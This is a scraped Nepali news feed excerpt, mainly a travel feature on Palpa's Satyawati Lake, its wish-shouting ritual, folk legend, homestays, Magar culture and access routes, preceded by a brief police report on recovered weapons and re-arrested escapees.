काठमाडौँ जिल्लाबाट मात्रै प्रहरीबाट लुटिएको २३ थान हतियार बरामद गर्न प्रहरी सफल भएको छ । तीमध्ये २३ जना पक्राउ परेका छन् । काठमाडौँबाट ७४ जना फरार कैदीलाई पक्राउ गरेर सम्बन्धित कारागारमा बुझाउने काम भएको एसएसपी थापाको भनाइ छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=364130तानसेनको सत्यवती ताल : पर्यटन र मनोकामना पुरा हुने विश्वास
https://www.antaranganews.com/?p=36336
https://www.antaranganews.com/?p=36336#respondSat, 01 Nov 2025 01:03:23 +0000https://www.antaranganews.com/?p=36336मानिसहरू स्वभावत घुमफिरमा रमाउछन् । तराईमा बसोवास गर्नेहरू पहाड र हिमाली श्रृखलामा घुमफिर गर्नका लागि उत्सुकता राख्दछन् भने पहाडी भूगोलमा रहने मानिसहरू सम्म ठाउँका शहर र बस्तीहरूमा घुमफिर गर्ने योजना बनाउछन् । प्राकृतिक रुपमा रहेका सम्पदाहरू नै अहिले घुमफिरको लागि सबैको रोजाइमा पर्दछ । आजभोलि धेरै पर्यटकहरू प्राकृतिक जैवीक विविधताको क्षेत्रमा घुम्न रुचाउछन । यो मानवको स्वभाव पनि हो, विविधतामा रमाउने । नयाँ ठाउँ र नयाँ बस्तु हेर्न पर्यटकहरू मन पराउछन् । पर्यटकलाई आकर्षणको गन्तब्य भनेको प्राकृतिक सौन्दर्य र जैविक विविधता, ऐतिहासिक तथा साँस्कृतिक सम्पदाहरूनै हुन ।
पर्यटनका लागि धेरै मानिसहरू पाल्पा तानसेन पुग्दछन । तानसेन पुगेपछि श्रीनगर, रानीमहल, भैरवस्थान र तानसेन बजारमा रहेका ऐतिहासिक पाल्पा दरवार, भगवतीको मन्दिर, शितलपाटी र नारायस्थान लगायतको स्थान घुमेपछि धेरै पर्यटक फर्किन्छन । तर तानसेन पुग्ने धेरै पर्यटकहरू भने अनौठो धार्मिक तीर्थस्थल सत्यवती मन्दिरमा पुग्दैनन् ।
पाल्पाको तिनाउँ गाउँपालिका– ४ कोलडाँडामा रहेको सत्यवती तालमा चिच्याएर वर माग्न पर्दछ । सिद्धार्थ राजमार्गमा पर्ने बुटवल– पाल्पा सडक खण्डको केरावारीदेखि चौबीस माइलबाट पूर्वी भागको पहाडमा सत्यवती ताल पर्दछ । चुरे पहाडको हराभरा वनभित्र फैलिएको सुन्दर सत्यवती ताल भित्र रहेको मन्दिरमा प्रत्येक कात्तिक पूर्णिमाका दिन विशेष मेला लाग्ने गर्दछ । सत्यवती देवीले कानले नसुन्ने भएकाले वर माग्दा चिच्याएर वर माग्नु पर्ने हुन्छ । रातको समयमा मन्दिरमा पूजा सकेर ताल परिक्रमा गर्दा चिच्याउँदै वर माग्ने प्रचलन छ । सत्यवती तालको धार्मिक मेलामा छिमेकी जिल्लावासी मात्र नभएर नेपाल– भारत सीमाक्षेत्र गोरखपुर, सुनौली, विहार लगायतका भारतीय तीर्थाटनका पर्यटकहरूसमेत पुग्ने गर्दछन् । सत्यवती तालमा कार्तिक १५ गते(आज)देखि १९ गतेसम्म मेला लाग्ने गर्दछ ।
सत्यवती ताल चुरे श्रृखलामा पर्दछ । महाभारत क्षेत्रबाट दक्षिणतर्फको पहाडलाई चुरे, चुरिया वा शिवालिक पर्वत भनिन्छ । नेपाल भित्र चुरे क्षेत्रले पूर्वको इलामदेखि सुदूरपश्चिमको कञ्चनपुरसम्म ३६ जिल्लाका केही न केही भूभागलाई ओगटेको छ । चुरे पहाडमा रहेको सत्यवती ताल वरपर सिमसार क्षेत्र पनि रहेको छ । जुन कारणले सत्यवती ताल जैविक विविधताको दृष्टिले पनि धनी छ । सत्यवती ताल वरपर रहेका चुरे पहाडमा करिब एक करोड वर्ष पुराना प्राग ऐतिहासिक वन्यजन्तुका अवशेषहरू रहेको अनुमान गरिएको छ । सत्यवती ताल ऐतिहासिक, धार्मिक तथा पर्यटकीय दृष्टिकोणले महत्वपूर्ण मानिन्छ । तीर्थाटनका पर्यटकहरूले मागेको वर पुगेपछि बोके, बासेको कुखुराको भाले र परेवा उडाउन सत्यवती तालमा पुग्दछन् । मेलामा जाने तीर्थाटनका पर्यटकहरूले चतुर्दशीको दिन तालमा साल अथवा बाँसको लिङगो गाडने र भोलिपल्ट आफूले गाडेको लिङगो चिनेर पूजा गर्ने गरिन्छ ।
सत्यवती बज्यै प्रकट भएको रोचक प्रसंग छ । कुनै कालमा स्थानीय मगर जातिको बालक बिहान सत्यवती ताल वरपर खेल्दै रहेछ । तालमा एक्कासी सत्यवती बज्यै प्रकट भइछन् । बिहानै कहिल्यै नदेखेकी बुढी आइमाई देखेपछि बालक डराए छन् । सत्यवती बज्यैले बालकलाई नडराउनु भन्दै म सत्यवती बज्यै हुँ । प्रत्येक वर्ष यसै समयमा म यही स्थानमा आउँनेछु । मसगं भेट भएको कुरा कसैलाई नभन्नु । मैले भनेको मान्यौ भने तिमीले आटेका सबै इच्छा मैले पूरा गरि दिनेछु । तर यी कुरा कसैलाई भन्यौ भने तिम्रो मृत्यु हुनेछ । घरमा पुगेपछि बालकले सत्यवती बज्यैसँगको भेटको कुरा सबै सुनाए । तर बालकको मृत्यु भएछ । यही लोककथाले प्रत्येक वर्ष कार्तिक पूर्णिमाको दिन सत्यवती तालमा मेला लाग्दै आएको छ ।
सत्यवती तालमा अहिले तीर्थाटन पर्यटकहरूका लागि काठबाट निर्मिट भु–टावर अर्थात मचान निर्माण भएको छ । काठको मचानमा चढेर हिमाल र पहाडका डाँडाकाँडाको दृश्यावलोकनका लागि पर्यटकहरूलाई सजिलो भएको छ । ताल नजिकै गाउँमा १० घरमा होमस्टे सञ्चालन गरिएको छ । आजभोलि सत्यवती ताल घुमफिर गर्न जाने पर्यटकहरूका लागि बास बस्न सजिलो भएको छ । होमस्टेमा प्रत्येक घरमा चार जना पाहुना राख्न सकिने कोठाहरू छन् । होमस्टेमा स्थानीय उत्पादनबाट बनेका परिकार ढिँडो, लोकल कुखुराको मासु, इच्छा हुनेलाई घरेलु मदिरा पनि दिने गरिन्छ । गाउँमा सन्चालन भएका होमस्टेमा बास बस्न प्याकेजमा, वेलकम स्न्याक्स, डिनर, एक रात बास ब्रेकफास्ट र लन्चको सुविधा पाइन्छ । साँझमा सांस्कृतिक कार्यक्रम देखाइन्छ । होमस्टेमा बसेर फर्कने पाहुनाका लागि स्थानीय उत्पादन उपहार स्वरुप प्रदान गर्दै आएका छन् । स्थानीय स्रोत र साधनको प्रयोग गरी निर्माण गरिएको फोटो उपहार स्वरुप त्यहाँ पुग्ने पर्यटकलाई गाउँले बेतबाँस र बाँसबाट उत्पादन भएको उपहार सशुल्क प्रदान गर्दछन् ।
सत्यवती बज्यैको पुकार र सत्य आस्थाको पवित्र ताल हो । सत्यवती ताल केवल पानीको पोखरी मात्र होइन, तीर्थाटन पर्यटकहरूको आस्थाको केन्द्र पनि हो । यो ताल समुद्र सतहदेखि करिब १ हजार ३७० मिटर उचाइमा पर्दछ । प्रकृति सौन्दर्यको संगम बनेको सत्यवती ताल सत्य, धर्म र आस्थाको जीवित प्रतीक हो । सत्यवती तालको इतिहास धार्मिक आस्थासँग गहिरो रुपमा जोडिएको छ । स्थानीय जनश्रुति अनुसार, यो तालमा सत्यवती बज्यै नामकी शक्तिशाली देवी वास गर्छिन । उहाँलाई सत्य बोल्ने, धर्मपालन गर्ने र निष्ठा राख्ने तीर्थालुहरू प्रति कृपालु देवीका रुपमा पूजा गरिन्छ । हिन्दू परम्परामा सत्यलाई धर्मको पहिलो स्तम्भ मानिन्छ र सत्यवती बज्यै त्यस सत्यको मूर्त प्रतीकका रुपमा सम्मानित छिन । पुराना बुढापाकाहरूको भनाइ अनुसार, पाल्पाका सेन राजा र स्थानीय मगर समुदायले सत्यवती माईलाई आस्थाको देवीका रुपमा पूजा गर्थे । दरबारका पुजारीहरूले हरेक वर्ष सत्यवती देवीको आराधना गरी देशमा सत्य, न्याय र धर्म स्थापनाको कामना गर्थे । त्यो परम्परा आजसम्म जीवित छ ।
सत्यवती तालको सबैभन्दा अदभुत र अनौठो धार्मिक संस्कार भनेको चिच्याएर वर माग्ने परम्परा हो । तीर्थाटनका पर्यटकहरूद्वारा मेलाको रात ताल वरिपरि दीप प्रज्वलित हुन्छ । तीर्थयात्रीहरू रातभर सत्यवती बज्यैको स्तुति, भजन र आरती गर्दै जाग्राम बस्छन । मध्यरात तिर जब वातावरण शान्त हुन्छ, सबै तीर्थयात्रीहरू तालको किनारमा उभिएर सत्यवती बज्यैसंग बर माग्दछन । कसैले रोग मुक्तिको वर माग्छ, कसैले सन्तानको, कसैले घरको सुख–शान्तिको, कसैले वैराग्य र मोक्षको त्यो क्षणमा सम्पूर्ण ताल श्रद्धाले कम्पित हुन्छ । जसको आवाज सत्यवती बज्यैले सुन्नुहुन्छ, उसको मनोकामना पूरा हुन्छ भन्ने बिश्वास छ । सत्यवती तालको धार्मिक र सांस्कृतिक महत्व सत्यवती ताललाई सत्य, धर्म र निष्ठाको प्रतीक मानिन्छ । सत्यवतीको मुख्य मान्यता यस्तो छ झूट बोल्ने मानिसले देवीको दर्शन पाउँदैन, र सत्यवती बज्यैले असत्य कर्म गर्नेले वर मागे सुन्दिनन् भन्ने बिश्वास गर्दछन ।
सत्यवती तालमा पर्यटकहरू प्राकृतिक सौन्दर्य र आध्यात्मिक शान्तिको खोजीमा पुग्दछन । तीर्थाटनको यात्रामा प्रकृतिसँगको साक्षात्कारले आस्थालाई अझ गहिरो बनाउँछ । हिन्दू शास्त्रमा प्रायः देवताहरू जलसँग सम्बन्धित छन । विष्णु शेषनागको बीचमा क्षीरसागरमा शयन गर्छन । शिव जलाशय नजिक ध्यानस्थ हुन्छन । सरस्वती नदीकै प्रतीक हुन । धार्मिक मेलाले स्थानीय विकासमा पनि ठूलो प्रभाव पार्छ । तीर्थस्थलसम्म पुग्ने बाटो, पुल, आवासगृह, स्वास्थ्य चौकी, सरसफाइ, सञ्चार सेवा आदि मेला अवधिमा सुधार हुने गर्दछ । धार्मिक मेलाहरू केवल श्रद्धा र पूजा होइनन, पर्यटन, अर्थतन्त्र, संस्कृति र पहिचानका जीवित रुप हुन । मेलाले स्थानीय सीप र उत्पादलाई बजार दिन्छ । परम्परालाई जीवित राख्छ, र आन्तरिक पर्यटनलाई गतिशील बनाउँछ । त्यसैगरी, ताल– पोखरी– नदीमा पुग्ने धार्मिक पर्यटकहरू केवल स्नान वा दर्शनका लागि होइन, आत्मशुद्धि, पवित्रता र शान्तिको खोजमा हुन्छन ।
सत्यवती तालमा जादा आफ्नो घुमघामको समय लम्वाउन सके पाल्पा जिल्लाको महाभारत र चुरे श्रृखलामा रहेका मगरजातिको गाउँहरूको यात्रा गर्न सकिन्छ । सत्यवती ताल भन्दा पूर्व तिर कसेनी, झडेवा, रुप्से, हुमिन, देवीनगर, चिडीपानी, गोठाडी, रहवास, वहादुरपुर हुदै वेणिमणिपुर भएर महेन्द्र राजमार्गको दुम्कीबास निस्कन सकिन्छ । यी सबै गाउँहरू मगत जातिका बस्तीहरू हुन् । मगर बस्तीमा घुमघाम गर्दा उनिहरूको भाषा र संस्कृतिको अध्यन हुन्छ । मगरजाति आफ्नै भाषा धर्म, संस्कृति र भेषभूषा भएको जाति हो । मगरजाति आदिबासी जनजाति समुहको सबै भन्दा ठूलो जनसंख्या भएको जाति पनि हो । जनसंख्याको आधारमा नेपालको तेस्रो ठूलो जनसंख्यामा मगरजाति पर्दछ । मगरजाति नेपाल आदिवासी जनजातिहरूको हकमा भने प्रथम श्रेणीमा पर्दछ ।
गाउँघरमा घुमफिर गर्दा मगर संस्कृतिका पहिरन र खुवाइ पाउदा नयाँ पर्यटकहरूका लागि अनौठो लाग्न सक्दछ । पुरुषहरूको बिशेष पहिरन भोटो र कछाडसँगै निलो पटुकी र भाग्रा, शिरमा टोपी अनि महिलाहरूको बिशेष पहिरन मखमली चोली र घलेक, छिटको गुन्यु, पहेंलो र निलो पटुकी, गलामा पहेंलो र हरियो पोते साथैमा कण्ठमाला र मुगामाला, शिरमा शिरफुल अनि चन्द्र, कानमा माडवारी, नाकमा बुलाकीले सजिएका मगरजातिहरू संग गाउँमा घुमफिर गर्ने ग्रामीण पर्यटकहरूले फोटो खिच्ने र उनिहरूको संस्कृतिमा रमाउन पाउछन् । पछिल्लो चरणमा आएर मगरजातिले बिस्तारै आफ्नो भेषभुषालाई छाडन थालेका छन् । सत्यवती तालमा घुमफिरमा जादा पदयात्रामा रमाउने पर्यटक धेरै हुन्छन् । पाल्पा जिल्लाको तिनाउ नदीको फराकिलो क्षेत्र, हरियाली वनजगल, मात्र नभएर मस्याङ, जन्तिलुङ्ग, रिङसिङलेक, पाटन, ठुलिउदाङ, हात्तिलेक, सुकेताल, जितगढी, नुवाकोट, रामापिथेकस क्षेत्र, सिद्धवावा मन्दिर जस्ता प्राकृतिक र धार्मिक क्षेत्रहरू पनि घुमघाम गर्न सके राम्रो हुन्छ ।
आजभोलि पर्यटनको क्षेत्र फराकिलो हुदै गएको छ । पर्यटनको विकास गर्नु पर्दछ भन्ने मान्यता सबैमा रहेको छ । शहर बजार गाउँघर, टोल छिमेक जहाँ भएपनि विकासका कुरा उठने बित्तीकै पर्यटनका कुराहरू उठने गर्दछन । पर्यटनको विकास गर्नु पर्दछ । पर्यटनको बिकासले नै आर्थिक विकास हुन्छ । बिकासको महत्वपूर्ण आधारनै पर्यटन हो । पर्यटनको बहुआयमिक रुपले विकासमा टेवा पु¥याउँछ । पर्यटनले प्रत्यक्ष आर्थीक आर्जन गराउँछ, रोजगारी सृजना गराउँछ र गाउँघरमा उत्पादन भएको वस्तुहरूको खपत हुन्छ । यस्ता खालका कुरा सबै क्षेत्रमा उठाउने गरिन्छ । तर, गाउँघरमा पर्याप्त मात्रामा पर्यटकीय क्षेत्रहरूको प्रवद्र्धन हुन सकेको छैन । गाउँघरका पर्यटकीयस्थलहरू ओझेलमा परेका छन् । पर्यटक पुग्ने सडक पर्यटन मैत्री छैनन् । पर्यटकीय सम्पदाको पुर्वाधारको बिकास र पर्याप्त प्रचार प्रसार हुन सकेको छैन । प्राकृतिक भ्युटावर भएको महाभारत पहाडी श्रृखलामा भ्युटावर निर्माण भएको छ । तर त्यहाँ पुग्ने पर्यटकहरूलाई चिया चमेना समेत खाने ठाउँ छैन । धेरै गाउँघरमा भएका पर्यटकीयस्थलमा पर्यटकहरू पुगे खान बस्नको समस्या छ । पर्यटकहरूले गाउँमाबाट ल्याउने कुरा केही छैन । अनि कसरी हुन्छ पर्यटनको विकास ?
गाउँघरमा धेरै मानिसहरू पुग्दैमा ती सबै पर्यटन हुदैनन् । पर्यटक हुनको लागि केही न केही पैसा खर्च गर्नु पर्दछ । पैसा खर्च नगर्ने मानिसहरू पर्यटक होइन केबल अवलोकन कर्ता मात्र मानिन्छन । पर्यटकीयस्थल वरपर पर्यटकहरूले खर्च गर्ने ठाउँ हुनु पर्दछ । त्यसको लागि गाउँघरमा उत्पादन बढाउनु पर्दछ । उत्पादन भएका बस्तु पर्यटकहरूले खरिद गरेपछि गाउँको उत्पादनले आय आर्जन हुन्छ । रोजगारी बढछ । गाउँको आर्थिक सुधार हुन्छ । अनि मात्र पर्यटन प्रवद्र्धन हुन्छ । पर्यटन प्रवद्र्धनको लागि पूर्वाधारको बिकास भएन भने पर्यटनको विकास, विस्तार र आर्थिक समृद्धि हुँदैन । पर्यटन विकास र विस्तार गरी गाउँमा भएर्का प्राकृतिक साँस्कृतिक, धार्मिक, पुरातात्विक सम्पदाहरूको संरक्षण र प्रबद्र्धन गर्नु पर्दछ । यसका लागि पर्यटकलाई प्रदान गरिने सेवाको गुणस्तर र संख्यात्मक विकासको लागि निजी क्षेत्रसँग सहकार्य बढाउने विविध कार्यक्रमहरू स्थानीय तहले संचालन गर्नु पर्दछ ।
अब तिनाउ गाउँपालिकाले सत्यवती तालमा पर्यटनको विकास गर्न गाउँघरमा सरसफाईदेखि लिएर सडक यातायातको पुर्वाधारको विकास गर्न जरुरी छ । गाउँमा कृषि उत्पादनलाई बढाउनु पर्दछ । स्थानीय कला, संस्कृतिलाई संरक्षण गर्नु पर्दछ । गाउँमा पुग्ने पर्यटकहरूलाई स्थानीय उत्पादन सशुल्क उपहार स्वरुप दिन सके मात्र गाउँमा ग्रामीण पर्यटकको विकास हुन्छ । यसको लागि स्थानिय र प्रदेश सरकारको ध्यान जान पर्दछ ।
सत्यवती ताल कसरी पुग्ने ?
बुटबल क्षेत्रबाट आउनेलाई दोभानको झुम्सा पानी मिलबाट पैदल २ घन्टा पैदल यात्रा गर्नु पर्ने हुन्छ । करीब छ किलोमिटर उकालो यात्रा सकेपछि सत्यवती तालमा पुग्न सकिन्छ । पाल्पाको तानसेन हुँदै सत्यवती ताल पुग्न सिद्धार्थ राजमार्ग पाल्पा बुटवल सडक खण्डको चर्चरे अथवा चौबीस माइलबाट २ घण्टाको पैदल यात्राबाट पनि सत्यवती ताल पुग्न सकिन्छ । दोभानको झुम्सा पुल देखि ८ किमी कच्ची मोटर मार्ग पनि छ । (लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
]]>https://www.antaranganews.com/?feed=rss2&p=363360